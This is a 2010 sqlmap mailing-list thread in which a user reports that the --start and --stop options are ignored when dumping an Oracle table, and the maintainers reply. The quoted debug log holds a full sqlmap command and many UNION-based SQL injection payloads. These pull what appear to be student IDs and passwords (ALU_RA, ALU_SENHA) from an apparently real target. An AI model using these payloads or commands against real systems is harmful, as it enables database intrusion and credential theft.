Re: [sqlmap-users] Bug(?) with --start/stop in oracle(maybe others)
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2010-04-26 18:38:16
|
Hi. Sorry, my fault. Bernardo said that he knows where to look for this one so he'll try to solve it soon. Kind regards. On Mon, Apr 26, 2010 at 6:42 PM, David Guimaraes <sk...@gm...> wrote: > Mirvoslav: > Don't work even passing --start 1 or --start 3 or anything in a table with X > rows.. i don't know if this is a oracle error or other thing.. sqlmap simply > ignores the parameter... tested and re-tested... if the table has 100 rows > and I pass --start to him to read until the tenth, he will read them all... > >> On Mon, Apr 26, 2010 at 6:27 AM, Bernardo Damele A. G. >> <ber...@gm...> wrote: >>> >>> Did you try without providing --start and --stop? Let me know please >>> if it correctly dump entries or not. >>> >>> Bernardo >>> >>> >>> On Sat, Apr 24, 2010 at 04:02, David Guimaraes <sk...@gm...> wrote: >>> > Syntax that had problems: >>> > >>> > $ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a >>> > --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop >>> > 4 -v >>> > 2 >>> > >>> > sqlmap/0.9-dev - automatic SQL injection and database takeover tool >>> > http://sqlmap.sourceforge.net >>> > >>> > [*] starting at: 22:52:50 >>> > >>> > [22:52:50] [DEBUG] initializing the configuration >>> > [22:52:50] [DEBUG] initializing the knowledge base >>> > [22:52:50] [DEBUG] cleaning up configuration parameters >>> > [22:52:50] [DEBUG] setting the HTTP timeout >>> > [22:52:50] [DEBUG] setting the HTTP method to GET >>> > [22:52:50] [DEBUG] creating HTTP requests opener object >>> > [22:52:50] [DEBUG] parsing XML queries file >>> > [22:52:50] [INFO] using '/path/session' as session file >>> > [22:52:50] [INFO] resuming injection point 'GET' from session file >>> > [22:52:50] [INFO] resuming injection parameter 'a' from session file >>> > [22:52:50] [INFO] resuming injection type 'stringsingle' from session >>> > file >>> > [22:52:50] [INFO] resuming 0 number of parenthesis from session file >>> > [22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file >>> > [22:52:50] [INFO] resuming union comment '--' from session file >>> > [22:52:50] [INFO] resuming union count 15 from session file >>> > [22:52:50] [INFO] resuming union position 1 from session file >>> > [22:52:50] [INFO] resuming union false condition 1 from session file >>> > [22:52:50] [INFO] testing connection to the target url >>> > [22:52:50] [DEBUG] got HTTP error code: 500 >>> > [22:52:50] [WARNING] the testable parameter 'a' you provided is not >>> > into the >>> > Cookie >>> > [22:52:50] [INFO] testing for parenthesis on injectable parameter >>> > [22:52:50] [DEBUG] skipping test for MySQL >>> > [22:52:50] [INFO] the back-end DBMS is Oracle >>> > web server operating system: Windows 2000 >>> > web application technology: ASP.NET, Microsoft IIS 6.0, ASP >>> > back-end DBMS: Oracle >>> > >>> > [22:52:50] [WARNING] on Oracle it is only possible to enumerate if you >>> > provide a TABLESPACE_NAME as database name. sqlmap is going to use >>> > 'USERS' >>> > as database name >>> > [22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for >>> > table >>> > 'ALU_ALUNOS' on database 'USERS' >>> > [22:52:50] [INFO] the SQL query provided has more than a field. sqlmap >>> > will >>> > now unpack it into distinct queries to be able to retrieve the output >>> > even >>> > if we are in front of a partial inband sql injection >>> > [22:52:50] [INFO] read from file '/path': 344305 >>> > [22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > ALU_ALUNOS-- AND 'RFOj'='RFOj >>> > [22:52:51] [DEBUG] performed 1 queries in 0 seconds >>> > [22:52:51] [INFO] the SQL query provided returns 344305 entries >>> > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=1-- >>> > AND 'qGli'='qGli >>> > [22:52:51] [DEBUG] performed 2 queries in 0 seconds >>> > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=2-- >>> > AND 'EXyf'='EXyf >>> > [22:52:53] [DEBUG] performed 3 queries in 1 seconds >>> > [22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=3-- >>> > AND 'CLyw'='CLyw >>> > [22:52:56] [DEBUG] performed 4 queries in 2 seconds >>> > [22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=4-- >>> > AND 'nHQn'='nHQn >>> > [22:52:57] [DEBUG] performed 5 queries in 0 seconds >>> > [22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=5-- >>> > AND 'iNmX'='iNmX >>> > [22:52:58] [DEBUG] performed 6 queries in 1 seconds >>> > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=6-- >>> > AND 'mVQM'='mVQM >>> > [22:52:58] [DEBUG] performed 7 queries in 0 seconds >>> > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=7-- >>> > AND 'FuqF'='FuqF >>> > [22:52:59] [DEBUG] performed 8 queries in 0 seconds >>> > [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=8-- >>> > AND 'utPd'='utPd >>> > [22:53:01] [DEBUG] performed 9 queries in 2 seconds >>> > [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=9-- >>> > AND 'ilBw'='ilBw >>> > [22:53:03] [DEBUG] performed 10 queries in 2 seconds >>> > [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=10-- >>> > AND 'YxAK'='YxAK >>> > ^C >>> > [22:53:04] [ERROR] user aborted >>> > >>> > [*] shutting down at: 22:53:04 >>> > >>> > >>> > >>> > As you can see, it will not stop consultation until the fourth, >>> > ignoring >>> > parameters passed in ("--start" and "--stop"). >>> > >>> > I gave ctrl + c in the tenth query. >>> > >>> > Am I doing something wrong or is it anyway? >>> > >>> > $ svn info >>> > Path: . >>> > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap >>> > Repository Root: https://svn.sqlmap.org/sqlmap >>> > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb >>> > Revision: 1588 >>> > Node Kind: directory >>> > Schedule: normal >>> > Last Changed Author: inquisb >>> > Last Changed Rev: 1588 >>> > Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010) >>> > >>> > -- >>> > David Gomes Guimarães >>> > >>> > >>> > ------------------------------------------------------------------------------ >>> > >>> > _______________________________________________ >>> > sqlmap-users mailing list >>> > sql...@li... >>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> > >>> > >>> >>> >>> >>> -- >>> Bernardo Damele A. G. >>> >>> E-mail / Jabber: bernardo.damele (at) gmail.com >>> Mobile: +447788962949 (UK 07788962949) >>> PGP Key ID: 0x05F5A30F >> >> >> >> -- >> David Gomes Guimarães > > > > -- > David Gomes Guimarães > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |